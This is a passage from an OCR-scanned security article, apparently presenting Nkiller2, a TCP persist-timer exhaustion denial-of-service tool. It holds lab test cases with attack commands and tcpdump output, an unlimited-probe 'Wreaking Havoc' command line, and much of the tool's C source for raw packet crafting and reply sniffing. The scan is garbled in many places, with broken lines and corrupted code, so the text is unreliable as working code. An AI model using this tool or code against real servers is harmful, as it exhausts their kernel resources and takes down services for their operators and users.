kernel resources wasted will be proportional to the number 
d applications and the amount of successful connections on 
Even if one service is brought down temporarily for one 
her, there will still be the other applications wasting 
filled up TCP SendQueue. 


t cases 


real world examples. We are going to demonstrate how 
Timer functionality and at the same time 


different behaviour that is exhibited from a Linux system 
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in contrast with an OpenBSD system. The file requested has to be more 
than 4.0 Kbytes (experimental value). 


- Test Case 1. 


Attacker: 10.0.0.12, Linux 2.6.26 
Target: 10.0.0.50, Apachel.3, OpenBSD 4.3 


iptables -A INPUT -s 10.0.0.50 -p tcp --dport 80 -j DROP 
iptables -A INPUT -s 10.0.0.50 -p tcp --sport 80 -j DROP 
./nkiller2 -t 10.0.0.50 -p80 -w /fil v -nl -T1l -P120 -s0 -g 


Starting Nkiller 2.0 ( http://sock-raw.org ) 
Probes: 
Probes per round: 100 

Pceap polling time: 100 microseconds 
Sleep time: 0 microseconds 

Key: Nkiller31337 

Probe interval: 120 seconds 
Template: BSD | Windows 

Guardmode on 


# tcpdump port 80 and host 10.0.0.50 -n 


08:55:30.017021 IP 10.0.0.12.40428 > 10.0.0.50.80: S 3456779693: 
3456779693(0) win 1024 <timestamp 1232693730 0,nop,nop,mss 1024> 
08:55:30.017280 IP 10.0.0.50.80 > 10.0.0.12.40428: S 3072651811: 
3072651811(0) ack 3456779694 win 16384 <mss 1460,nop,nop,timestamp 
464912143 1232693730> 


08:55:30.017461 IP 10.0.0.12.40428 > 10.0.0.50.80: . 1:23(22) ack 1 

win 1024 <timestamp 1232693730 464912143,nop,nop> 

08:55:30.019288 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1:1013(1012) ack 23 
win 17204 <nop,nop,timestamp 464912143 1232693730> 

08:55:30.019311 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0 
<timestamp 1232693730 464912143,nop,nop> 

08:55:35.009929 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912153 1232693730> 

08:55:40.009505 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912163 1232693730> 

08:55:45.009056 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912173 1232693730> 

08:55:53.008388 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912189 1232693730> 

08:56:09.007027 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912221 1232693730> 

08:56:41.004286 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912285 1232693730> 

08:57:40.999239 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23 
win 17204 <nop,nop,timestamp 464912405 1232693730> 

08:57:40.999910 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0 


<timestamp 1232693860 464912405,nop,nop> 


Notice that OpenBSD transmits httpd’s initial data in one segment in which 
the ACK to our payload is included. Nkiller2 acknowledges that packet, 
advertising at the same time a zero window. After that, OpenBSD’s TCP 
transmits a zero probe and sets the Persist Timer. After a little more 
than 120 seconds (57:40 - 55:30), we answer to the Persist Timer’s probe. 
Note that we specified the probe_interval with the option -P120 
(approximately 120 seconds). 


— Test Case 2. 


Attacker: 10.0.0.12, Linux 2.6.26 
Target: 10.0.0.101, Apache2.2.3, Debian "etch" (2.6.18) 
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iptables -A INPUT -s 10.0.0.101 -p tcp --dport 80 -j DROP 
iptables -A INPUT -s 10.0.0.101 -p tcp --sport 80 -j DROP 
./nkiller2 -t 10.0.0.101 -p80 -w /fil nl -TO -P50 -s0 -v 


Starting Nkiller 2.0 ( http://sock-raw.org ) 
Probes: 
Probes per round: 100 

Pcap polling time: 100 microseconds 
Sleep time: 0 microseconds 

Key: Nkiller31337 

Probe interval: 50 seconds 
Template: Linux 


tcpdump port 80 and host 10.0.0.101 -n 


1:09:33.350783 IP 10.0.0.12.26528 > 10.0.0.101.80: S 3497611066: 
497611066(0) win 1024 <timestamp 1232752173 0,nop,nop,mss 1024> 
1:09:33.350893 IP 10.0.0.101.80 > 10.0.0.12.26528: S 2167814821: 
167814821(0) ack 3497611067 win 5792 <mss 1460,nop,nop,timestamp 
294906445 1232752173> 
1:09:33.351189 IP 10.0.0.12.26528 > 10.0.0.101.80: . 1:23(22) ack 1 

in 1024 <timestamp 1232752173 4294906445,nop,nop> 

1:09:33.351308 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294906445 1232752173> 

1:09:33.382100 IP 10.0.0.101.80 > 10.0.0.12.26528: . 1:513(512) ack 23 

in 5792 <nop,nop,timestamp 4294906452 1232752173> 

1:09:33.382138 IP 10.0.0.101.80 > 10.0.0.12.26528: P 513:1025(512) ack 23 
in 5792 <nop,nop,timestamp 4294906452 1232752173> 

1:09:33.389359 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 513 win 512 
<timestamp 1232752173 4294906452,nop,nop> 

01:09:33.389508 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1025 win 0 
<timestamp 1232752173 4294906452,nop,nop> 

01:09:33.590164 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294906505 1232752173> 
1:09:33.998135 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294906607 1232752173> 
1:09:34.814073 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294906811 1232752173> 
1:09:36.445959 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294907219 1232752173> 
1:09:39.709739 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294908035 1232752173> 
1:09:46.237279 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294909667 1232752173> 
1:209:259..292377 TP 10.020.101.80 > 1000.0.1T2526528%. . ack 23:.win 5792 
nop,nop,timestamp 4294912931 1232752173> 
1:10:25.402550 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792 
nop,nop,timestamp 4294919459 1232752173> 

1:10:25.427760 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1024 win 0 
<timestamp 1232752225 4294919459,nop,nop> 


U 


CHE OZOCACDZOCBRNOWO 


U 


DACADADOADADADACA 


Linux first sends a pure ACK (which is ignored by Nkiller2) and then 
transmits the first 2 data segments (512 bytes each). Nkiller2 waits until 
both of them arrive and acknowledges them with one zero window ACK packet. 
Linux then starts sending us zero probes (which have a datalength equal to 
zero in constrast with *BSD which send 1 byte of data), that go unanswered 
until about (10:25 -— 09:33) 50 seconds pass. 


—- Test Case ’Wreaking Havoc’ 


# nkiller2 -t <target> -p80 -w <path> -n0O -TO -P100 -s0O -v -N100 


—-n0: unlimited probes 
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-N100: will send 100 SYN probes per round (a round finishes when 
we either get a data segment or a zero probe) 


Use at your own discretion. 
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5 - Nkiller2 implementation 


Nkiller 2.0 - a TCP exhaustion/stressing tool 
Copyright (C) 2009 ithilgore <ithilgore.ryu.L@gmail.com> 
sock-raw.org 


This program is free software: you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published by 
the Free Software Foundation, either version 3 of the License, or 
(at your option) any later version. 


This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


Gl 


You should have received a copy of the GNU General Public License 
along with this program. If not, see <http://www.gnu.org/licenses/>. 


OMPILATION: 

gcc nkiller2.c -o nkiller2 -lpcap -lssl -Wall -02 

as been tested and compiles successfully on Linux 2.6.26 with gcc 
-3.2 and FreeBSD 7.0 with gcc 4.2.1 


de 
nd 


Nc 
Nc 


Nc 
Nc 
Nc 
Nc 
Nc 


Nc 


Nc 
Nc 
Nc 
nc 


inable BSD-style (struct ip) support on Linux. 


ifdef — linux __ 


ndef _ FAVOR_BSD 
efine __FAVOR_BSD 


ndef USE_BSD 
efine __USE_BSD 


ndef ~BSD_ SOURCE 
efine _BSD_SOURC 


Gl 


fine IPPORT_MAX 65535u 


af 


lude <sys/types.h> 
lude <sys/socket.h> 


lude <arpa/inet.h> 

lude <netinet/in.h> 

lude <netinet/in_systm.h> 
lude <netinet/ip.h> 

lude <netinet/tcp.h> 


lude <openssl/hmac.h> 


lude <errno.h> 
lude <pcap.h> 

lude <stdarg.h> 
lude <stdio.h> 
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include <stdlib.h> 
include <string.h> 
include <sysexits.h> 
include <time.h> 
include <unistd.h> 
include <getopt.h> 


/* 
* Pseudo-header used for 
* reach the wire 
*/ 

typedef struct pseudo_hdr 

uint32_t src; 
uint32_t dst; 
unsigned char mbz; 
unsigned char proto; 
uintl6_t len; 

} pseudo_hdr; 


/* 
* TCP timestamp struct 


at 


define DEFAULT_KEY "Nkiller31337" 
define DEFAULT_NUM_PROBES 100000 
define DEFAULT_PROBES_RND 100 
define DEFAULT_POLLTIME 100 
define DEFAULT_SLEEP_TIME 100 
define DEFAULT_PROBE_INTERVAL 150 
define WEB PAYLOAD "GET / HTTP/1.0\015\012\015\012" 
/* Timeval subtraction in microseconds */ 
define TIMEVAL_SUBTRACT(a, b) \ 
(((a).tvisec —- (b).tv_sec) * 1000000L + (a).tv_usec - (b).tv_usec) 


checksumming; this header should never 


typedef struct tcp_timestamp { 


char kind; 
char length; 


uint32_t tsval __attribute__((__packed__) ); 
uint32_t tsecr __attribute__((__packed__)); 


char padding[2]; 
} tcp_timestamp; 


/* 


* TCP Maximum Segment Size 


mi 

typedef struct tcp_mss { 
char kind; 
char length; 


uintl6_t mss __attribute__((__packed__)); 


} tcp_mss; 


invalid packet etc */ 


_FDACK, /* first data ack - in reply to our first data */ 


/* Network stack templates */ 

enum { 
T_LINUX, 
T_BSDWIN 

}; 

/* Possible replies */ 

enum { 
S_ERR, /* no reply, RST, 
S_SYNACK, /* 2nd part of initial handshake */ 
Ss 
S_DATA_0O, /* first data packet */ 
S_DATA_1, /* second data packet */ 


n 
ae) 
vs) 
oO 
Ww 
eal 
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/* persist timer probe */ 


* Ethernet header stuff. 


#define ETHER ADDR LEN 6 

#tdefine SIZE ETHERNET 14 

typedef struct ethernet { 
u_char ether_dhost [ETHER_ADDR_LEN]; /* Destination host address */ 
u_char ether_shost [ETHER_ADDR_LEN]; /* Source host address */ 


u_short ether_type; 


} ether_hdr 


/* 


1’ 


/* Frame type */ 


* Global nkiller options struct 


«ff 


typedef struct Options { 
char target[16]; 

har skey[32]; 

har payload[256]; 

har path[256]; 

har vhost[256]; 


intlé_t 
nsigned 
nsigned 
nsigned 


*portlist; 
probe_interval; /* interval for our persist probe reply */ 


int 
int 
int 
int 


probes; 


/* relative to virtual-host/ip path */ 
/* virtual host name */ 


/* total number of fully-connected probes */ 


probes_per_rnd; /* number of probes per round */ 


nsigned 
nsigned 


nt verbo 
nt debug 
int debug 
} Options; 


Bee ee oOo eee caaa|a 


/* 


int 


se; 
r 


2; 


polltime; 
sleep; 


nt template; 
nt dynamic; 
nt guardmode; 


* Port list types 


7, 


/* how many microsecods to poll pcap */ 

/* sleep time between each probe */ 

/* victim network stack template */ 

/* remove ports from list when we get RST */ 
/* continue answering to zero probes */ 


/* some debugging info */ 
/* all debugging info */ 


typedef struct port_elem { 
uint1l6_t port_val; 
struct port_elem *next; 
} port_elem; 


typedef struct port_list { 
port_elem *first; 
port_elem *last; 


} port_list 


/* 


1’ 


* Host information 


*/ 


typedef struct HostInfo 
struct in_addr daddr; 
char *payload; 


char *url 
char *vho 
size_t pl 
size_t wl 


TY 

st; 
en; 
en; 


port_list ports; 
unsigned int portlen,; 


} HostInfo; 


{ 
/* target ip address */ 


/* payload length */ 
/* http request length */ 
/* linked list of ports */ 
/* how many ports */ 


typedef struct SniffiInfo { 
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struct in_addr saddr; /* local ip */ 
pcap_if_t *dev; 
pcap_t *pd; 

} SniffiInfo; 


typedef struct Sock { 
struct in_addr saddr; 
struct in_addr daddr; 
uintl6_t sport; 
uintl6_t dport; 

} Sock; 


/* global vars */ 
Options o; 


/**** function declarations ****/ 


/* helper functions */ 

static void fatal(const char *fmt, ...); 

static void usage (void); 

static void help(void); 

static void *xcalloc(size_t nelem, size_t size); 
static void *xmalloc(size_t size); 

static void *xrealloc(void *ptr, size_t size); 


/* port-handling functions */ 

static void port_add(HostInfo *Target, uintl6_t port); 

static void port_remove(HostInfo *Target, uintl6_t port); 

static int port_exists(HostInfo *Target, uintl6_t port); 

static uintl6_t port_get_random(HostInfo *Target); 

static uintl6_t *port_parse(char *portarg, unsigned int *portlen); 


/* packet helper functions */ 

static uintlé6é_t checksum_comp(uintl6_t *addr, int len); 

static void handle_payloads (HostInfo *Target) ; 

static uint32_t calc_cookie(Sock *sockinfo) ; 

static char *build_mss(char **tcpopt, unsigned int *tcpopt_len, 
uint1l6_t mss); 

static int get_timestamp(const struct tcphdr *tcp, uint32_t *tsval, 
uint32_t *tsecr); 

static char *build_timestamp(char **tcpopt, unsigned int *tcpopt_len, 
uint32_t tsval, uint32_t tsecr); 


/* sniffing functions */ 

static void sniffer_init (HostInfo *Target, SniffInfo *Sniffer); 

static int check_replies(HostInfo *Target, SniffInfo *Sniffer, 
u_char **reply); 


/* packet handling functions */ 
static void send_packet (char* packet, unsigned int *packetlen); 
static void send_syn_probe(HostInfo *Target, SniffiInfo *Sniffer); 
static int send_probe(const u_char *reply, HostInfo *Target, int state); 
static char *build_tcpip_packet (const struct in_addr *source, 
const struct in_addr *target, uintl6_t sport, uintl6_t dport, 
uint32_t seq, uint32_t ack, uint8_t ttl, uintl6_t ipid, 
uintl6_t window, uint8_t flags, char *data, uintl6_t datalen, 
char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen) ; 


/****k function definitions ****/ 


/* 


* Wrapper around calloc() that calls fatal when out of memory 
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static void * 

xcalloc(size_t nelem, size_t size) 


{ 


void *p; 


p = calloc(nelem, size); 
if (p == NULL) 

fatal ("Out of memory\n"); 
return p; 


/* 
* Wrapper around xcalloc() that calls fatal() when out of memory 
Ff. 

static void * 

xmalloc(size_t size) 

{ 

return xcalloc(l, size); 


} 


static void * 
xrealloc(void *ptr, size_t size) 


{ 


void *p; 
p = realloc(ptr, size); 
if (p == NULL) 


fatal ("Out of memory\n"); 
return p; 


/* 
* vararg function called when sth _evil_ happens 
* usually in conjunction with __func__ to note 
* which function caused the RIP stat 
a 


static void 
fatal(const char *fmt, ...) 
{ 
va_list ap; 
va_start(ap, fmt); 
(void) vfprintf(stderr, fmt, ap); 
va_end(ap); 
exit (EXIT_FAILUR 


GJ 


i 


/* Return network stack template */ 
static const char * 
get_template(int template) 
{ 
switch (template) { 
case T_LINUX: 
return ("Linux"); 
case T_BSDWIN: 
return("BSD | Windows"); 
default: 
return ("Unknown") ; 
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/* 
* Pri 
ay 


static 
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nt a short usage summary and exit 


void 


usage (void) 


{ 
fpri 


/* 
a. tP aes 
xy 

static 

help (v 

{ 

stat 
"N 
Ww \ 
we 
Why 
WwW \ 
"N 
Ww \ 


"U 


ntf (stderr, 


"nkiller2 [-t addr] [-p ports] [-k key] [-n total probes]\n" 
v [-N probes/rnd] [-c msec] [-l payload] [-w path]\n" 
” [-s sleep] [-d level] [-r vhost] [-T template] \n" 

iy [-P probe-interval] [-hvyg]\n" 


"Please use ‘-h’ for detailed help.\n"); 
(EX_USAGE) ; 


nt detailed help 


void 
oid) 


ic const char *help_message = 

killer2 - a TCP exhaustion & stressing tool\n" 

n" 

opyright (c) 2008 ithilgore <ithilgore.ryu.L@gmail.com>\n" 
ttp://sock-raw.org\n" 

n" 

killer is free software, covered by the GNU General Public License," 
nand you are welcome to change it and/or distribute copies of it " 
nder\ncertain conditions. See the file ‘COPYING’ in the source\n" 


"distribution of nkiller for the conditions and terms that it is\n" 
"distributed under.\n" 


WK 


W 
ay 
W b 


Wwe 


W fo) 
W 


Wy 


"U 


"U 
W \ 


W 


1 


W 


n" 
WARNING: \n" 


[The authors disclaim any express or implied warranties, including, \n" 


ut not limited to, the implied warranties of merchantability and\n" 
itness for any particular purpose. In no event shall the authors " 
r\ncontributors be liable for any direct, indirect, incidental, " 


special, \nexemplary, or consequential damages (including, but not " 


imited to, \nprocurement of substitute goods or services; loss of " 
se, data, or\nprofits; or business interruption) however caused and" 
on any theory\nof liability, whether in contract, strict liability," 
or tort\n(including negligence or otherwise) arising in any way out" 
of the use\nof this software, even if advised of the possibility of" 
such damage.\n\n" 


sage: \n" 
n" 
nkiller2 -t <target> -p <ports> [options] \n" 
n" 
"Mandatory: \n" 
-t target The IP address of the target host.\n" 
—-p port[,port] A list of ports, separated by commas. Specify\n" 


only ports that are known to be open, or use\n" 
-y when unsure.\n" 


"Options: \n" 


-c msec Time in microseconds, between each pcap poll\n" 
for packets (pcap poll timeout).\n" 

-d level Set the debug level (1: some, 2: all)\n" 

-h Print this help message. \n" 

-k key Set the key for reverse SYN cookies.\n" 

-l payload Additional payload string.\n" 

-s sleep Average time in ms between each probe. \n" 


—-n probes Set the number of probes, 0 for unlimited.\n" 


Ww —-N Pp 
ae 2 
" oP t 
aw 


EON, 


"sure.\ 


printf ("% 
fflush(st 


/* 
* Build a 
*/ 


static char 
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robes/rnd Number of probes per round.\n" 

emplate Attacked network stack template:\n" 
0. Linux (default) \n" 
1. *BSD Windows \n" 

ime Number of seconds after which we reply to the\ 
persist timer probes.\n" 

ath URL or GET request to web server. The path of\ 
a big file (> 4K) should work nicely here.\n" 

host Virtual host name. This is needed for web\n" 
hosts that support virtual hosting on HTTP1.1\ 
Guardmode. Continue answering to zero probes \ 
until the end of times.\n" 
Dynamic port handling. Remove ports from the\ 
port list if we get an RST for them. Useful\n" 
when you do not know if one port is open for " 

nt 
Verbose mode.\n"; 

s", help_message) ; 


dout); 


TCP packet from its constituents 


* 


build_tcpip_packet (const struct in_addr *source, 


const s 
UINne3 2: 
uint1l6_ 
char *t 


char *pac 
struct ip 
struct tc 
pseudo_hd 
char *tcp 
/* fake 1 
unsigned 


if (tcpop 
fatal (" 


*packetle 
if (*pack 
chklen 
else 

chklen 


packet = 
ip = (str 
tcp = (st 
tcpdata = 


memset (pa 


truct in_addr *target, uintl6_t sport, uintl6_t dport, 

t seq, uint32_t ack, uint8_t ttl, uintl6_t ipid, 

t window, uint8_t flags, char *data, uintl6_t datalen, 
cpopt, unsigned int tcpopt_len, unsigned int *packetlen) 


ket; 
*ip; 
phdr *tcp; 
r *phdr; 
data; 
ength to account for 16bit word padding chksum */ 
int chklen; 


t_len % 4) 
TCP option length must be divisible by 4.\n"); 


n = sizeof(*ip) + sizeof(*tcp) + tcpopt_len + datalen; 
etlen % 2) 
= *packetlen + 1; 


= *packetlen; 

xmalloc(chklen + sizeof (*phdr)); 

uct ip *)packet; 

ruct tcphdr *) ((char *)ip + sizeof(*ip)); 


(char *) ((char *)tcp + sizeof (*tcp) + tcpopt_len); 


cket, 0, chklen); 


ip->ip_v = 4; 

ip->ip_hl = 5; 

ip->ip_tos = 0; 

ip->ip_len = *packetlen; /* must be in host byte order for FreeBSD */ 
ip->ip_id = htons(ipid); /* kernel will fill with random value if 0 */ 
ip->ip_off = 0; 

ip->ip_ttl = ttl; 

ip->ip_p = IPPROTO_TCP; 


ip->ip_sum = checksum_comp((unsigned short *)ip, sizeof(struct ip)); 
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source->s_addr; 
target-—>s_addr; 


ip->ip_srce.s_addr 
ip->ip_dst.s_addr 


tcp->th_sport htons (sport); 
tcp->th_dport htons (dport); 
tcp->th_seq = seq; 

tcp->th_ack = ack; 

tep->th_x2 = 0; 

tep->th_off = 5 + (tcpopt_len / 4); 
tcp->th_flags = flags; 

tcp->th_win = htons (window) ; 
tcp->th_urp = 0; 


memcpy ((char *)tcp + sizeof (*tcp), tcpopt, tcpopt_len); 
memcpy (tcpdata, data, datalen); 


/* pseudo header used for checksumming */ 

phdr = (struct pseudo_hdr *) ((char *)packet + chklen); 

phdr->srce = source->s_addr; 

phdr->dst = target->s_addr; 

phdr->mbz = 0; 

phdr->proto = IPPROTO_TCP; 

phdr->len = ntohs((tcp->th_off * 4) + datalen); 

/* tcp checksum */ 

tcp->th_sum = checksum_comp((unsigned short *)tcp, 
chklen - sizeof(*ip) + sizeof(*phdr) ); 


return packet; 


/* 
* Write the packet to the network and free it from memory 
*/ 

static void 

send_packet (char* packet, unsigned int *packetlen) 

{ 

struct sockaddr_in sin; 
int sockfd, one; 


Ssin.sin_family = AF_INET; 


sin.sin_port = ((struct tcphdr *) (packet + 
sizeof (struct ip)))->th_dport; 
sin.sin_addr.s_addr = ((struct ip *) (packet) )->ip_dst.s_addr; 


if ((sockfd = socket (AF_INET, SOCK _RAW, IPPROTO_RAW)) < 0) 
fatal("cannot open socket"); 


one = 1; 
setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (const char *) é&one, 
sizeof (one)); 


if (sendto(sockfd, packet, *packetlen, 0, 
(struct sockaddr *)&sin, sizeof(sin)) < 0) { 
fatal("sendto error: "); 
} 
close(sockfd); 
free (packet); 


* Build TCP timestamp option 
* tcpopt points to possibly already existing TCP options 
* so inspect current TCP option length (tcpopt_len) 
x 
static char * 
build_timestamp(char **tcpopt, unsigned int *tcpopt_len, 
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uint32_t tsval, uint32_t tsecr) 


struct timeval now; 
tcp_timestamp t; 
char *opt; 


if (*tcpopt_len) { 
opt = xrealloc(*tcpopt, *tcpopt_len + sizeof(t)); 
*tcpopt = opt; 
opt += *tcpopt_len; 
} else 
*tcpopt = xmalloc(sizeof(t)); 


memset (&t, TCPOPT_NOP, sizeof(t)); 
t.kind = TCPOPT_TIMESTAMP; 
t.length = 10; 
if (gettimeofday(&now, NULL) < 0) 
fatal ("Couldn’t get time of day\n"); 
t.tsval = htonl((tsval) ? tsval : (uint32_t)now.tv_sec); 
t.tsecr htonl((tsecr) ? tsecr : 0); 


if (*tcpopt_len) 

memcpy (opt, &t, sizeof(t)); 
else 

memcpy (*tcpopt, &t, sizeof(t)); 


*tcpopt_len += sizeof(t); 


return *tcpopt; 


/* 
* Build TCP Maximum Segment Size option 
AU 
static char * 
build_mss(char **tcpopt, unsigned int *tcpopt_len, uint1l6_t mss) 
{ 
SEEUCT. TCp.umMsis: 't; 
char *opt; 


if (*tcpopt_len) { 
opt = realloc(*tcpopt, *tcpopt_len + sizeof(t)); 
*tcpopt = opt; 
opt += *tcpopt_len; 
} else 
*tcpopt = xmalloc(sizeof(t)); 


memset (&t, TCPOPT_NOP, sizeof(t)); 
t.kind = TCPOPT_MAXSEG; 

t.length = 4; 

t.mss = htons(mss)j; 


if (*tcpopt_len) 

memcpy (opt, &t, sizeof(t)); 
else 
memcpy (*tcpopt, &t, sizeof(t)); 


*tcpopt_len += sizeof(t); 
return *tcpopt; 


/* 
* Perform pcap polling (until a certain timeout) and 
* return the packet you got - also check that the 
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* packet we get is something we were expecting, according 
* to the reverse cookie we had set in the tcp seq field. 
* Returns the virtual state that the reply denotes and which 
* we differentiate from each other based on packet parsing techniques. 
*/ 
static int 
check_replies (HostInfo *Target, SniffInfo *Sniffer, u_char **reply) 


{ 


int timedout = 0; 

int goodone = 0; 

const u_char *packet = NULL; 
uint32_t decoded_seq; 
uint32_t ack, calc_ack; 
int state; 

uintl6_t datagram_len; 
uint32_t datalen; 

struct Sock sockinfo; 
struct pcap_pkthdr phead; 
const struct ip *ip; 

const struct tcphdr *tcp; 
struct timeval now, wait; 
uint32_t tsval, tsecr; 
uint32_t time_elapsed = 0; 


state = 0; 


if (gettimeofday(&wait, NULL) < 0) 
fatal ("Couldn’t get time of day\n"); 
/* poll for '’polltime’ micro seconds */ 

wait.tv_usec += o.polltime; 


do 
datagram_len = 0; 
packet = pcap_next (Sniffer->pd, &phead); 
if (gettimeofday(&now, NULL) < 0) 
fatal ("Couldn’t get time of day\n"); 
if (TIMEVAL_SUBTRACT (wait, now) < 0) 


timedout++; 
if (packet == NULL) 

continue; 
/* This only works on Ethernet be warned */ 
if (*(packet + 12) != 0x8) { 


break; /* not an IPv4 packet */ 


ip = (const struct ip *) (packet + SIZE_ETHERNET) ; 


TCP/IP header checking - end cases are more than the ones 
* checked below but are so rarely happening that for 

* now we won’t go into trouble to validate - could also 

* use validedpkt() from nmap/tcpip.cc 

ay 
if (ip->ip_hl < 5) { 

if (o.debug2) 

(void) fprintf(stderr, "IP header < 20 bytes\n"); 

break; 


} 
if (ip->ip_p != IPPROTO_TCP) { 
if (o.debug2) 
(void) fprintf(stderr, "Packet not TCP\n"); 
break; 


} 


datagram_len = ntohs(ip->ip_len); /* Save length for later */ 
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tcp = (const void *) ((const char *)ip + ip->ip_hl * 4); 
if (tcp->th_off < 5) { 
if (o.debug2) 
(void) fprintf(stderr, "TCP header < 20 bytes\n"); 
break; 


} 


datalen = datagram_len - (ip->ip_hl * 4) - (tcp->th_off * 4); 


/* A non-ACK packet is nothing valid */ 
if (!(tcp->th_flags & TH_ACK) ) 
break; 


/* 
* We swap the values accordingly since we want to 
* check the result with the 4tuple we had created 
* when sending our own syn probe 
if 

sockinfo.saddr.s_addr = ip->ip_dst.s_addr; 

sockinfo.daddr.s_addr = ip->ip_src.s_addr; 

sockinfo.sport = ntohs(tcp->th_dport) ; 
sockinfo.dport ntohs (tcp->th_sport) 
decoded_seq = calc_cookie(&sockinfo) ; 


é 


if (tcp->th_flags & (TH_SYN|TH_RST)) { 


ack = ntohl(tcp->th_ack) - 1; 
calc_ack = ntohl (decoded_seq) ; 
/* 


* We can’t directly compare two values returned by 
* the ntohl functions 
= fi 
if (ack != calc_ack) 
break; 


/* OK we got a reply to something we have sent */ 


/* SYNACK case */ 
if (tcp->th_flags & TH_SYN) { 


if (o.dynamic && port_exists (Target, sockinfo.dport)) { 
if (o.debug2) 
(void) fprintf(stderr, "Port doesn’t exist in list " 
"— probably removed it before due to an RST and dynamic " 
"handling\n"); 
break; 
} 
if (o.debug) 
(void) fprintf(stdout, 
"Got SYN packet with seq: %x our port: %u " 
"target port: Zu\n", decoded_seq, 
sockinfo.sport, sockinfo.dport); 


goodonet+t; 
state = S_SYNACK; 


/* ERR case */ 
} else if (tcp->th_flags & TH_RST) { 


/* 
* If we get an RST packet this means that the port is 
* closed and thus we remove it from our port list. 

*/ 
if (o.debug2) 
(void) fprintf(stdout, 
"Oops! Got an RST packet with seq: %x " 
"port %u is closed\n",decoded_seq, 
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sockinfo.dport) ; 
if (o.dynamic) 
port_remove (Target, sockinfo.dport); 
} 
} else { 
/* 
* Each subsequent ACK that we get will have the 
* same acknowledgment number since we won’t be sending 
* any more data to the target. 


27, 
ack = ntohl (tcp->th_ack) ; 
calc_ack = ntohl(decoded_seq) + Target->wlen + 1; 
if (ack != calc_ack) 

break; 


struct timeval now; 
if (get_timestamp(tcp, &tsval, &tsecr)) { 
if (gettimeofday(&now, NULL) < 0) 
fatal ("Couldn’t get time of day\n"); 
time_elapsed = now.tv_sec - tsecr; 
if (o.debug) 
(void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n", 
time_elapsed, sockinfo.sport); 


} else 
(void) fprintf(stdout, "Warning: No timestamp available from " 
"target host’s reply. Chaotic behaviour imminent...\n"); 


/* 
* First Data Acknowledgment case (FDACK) 

* Note that this packet may not always appear, since there 

* is a chance that it will be piggybacked with the first 

* sending data of the peer, depending on whether the delayed 
* acknowledgment timer expired or not at the peer side. 
* 
* 
* 
f 


Practically, we choose to ignore it and wait until 
we receive actual data. 
/ 
(ack == calc_ack && (!datalen || datalen == 1) 
&& time_elapsed < o.probe_interval) { 
state = S_FDACK; 


i 


break; 

} 

/* 

* Data - victim sent the first packet(s) of data 
Ai. 

if (ack == calc_ack && datalen > 1) { 


if (tcp->th_flags & TH_PUSH) { 
state = S_DATA_1; 


goodonet+t; 
break; 
} else { 
state = S_DATA 0; 
goodonett; 
break; 


Persist (Probe) Timer reply 

The time_elapsed limit must be at least equal to the product: 
(‘persist_timer_interval’ * '/proc/sys/net/ipv4/tcp_retries2’ ) 
or else we might lose an important probe and fail to ack it 

On Linux: persist_timer_interval = about 2 minutes (after it has 
Stabilized) and tcp_retries2 = 15 probes. 

Note we check ’datalen’ for both 0 and 1 since Linux probes 

with 0 data, while *BSD/Windows probe with 1 byte of data 


+ + + + + + FF F F FX 


9.txt Wed Apr 26 09:43:46 2017 38 


if (ack == calc_ack && (!datalen || datalen == 1) 
&& time_elapsed >= o.probe_interval) { 
state = S_PROBE; 
goodonett; 
break; 


} 


} while (!timedout && !goodone) ; 


if (goodone) { 
*reply = xmalloc(datagram_len); 
memcpy (*reply, packet + SIZE_ETHERNET, datagram_len) ; 


} 


return state; 


/* 
* Parse TCP options and get timestamp if it exists. 

* Return 1 if timestamp valid, 0 for failure 

*/ 

int 
get_timestamp(const struct tcphdr *tcp, uint32_t *tsval, uint32_t *tsecr) 
{ 

u_char *p; 

unsigned int op; 

unsigned int oplen; 

unsigned int len = 0; 


if (!tsval || !tsecr) 
return 0; 


p = ((u_char *)tcp) + sizeof (*tcp); 
len = 4 * tcp->th_off - sizeof (*tcp); 


while (len > 0 && *p != TCPOPT_EOL) { 
Op: = Ap tt; 
if (op == TCPOPT_EOL) 
break; 
if (op == TCPOPT_NOP) { 
len--; 


continue; 
} 
oplen = *pt++t; 
if (oplen < 2) 
break; 
if (oplen > len) 
break; /* not enough space */ 


if (op == TCPOPT_TIMESTAMP && oplen == 10) { 
/* legitimate timestamp option */ 
if (tsval) { 


memcpy ((char *)tsval, p, 4); 
*tsval = ntohl(*tsval); 
} 
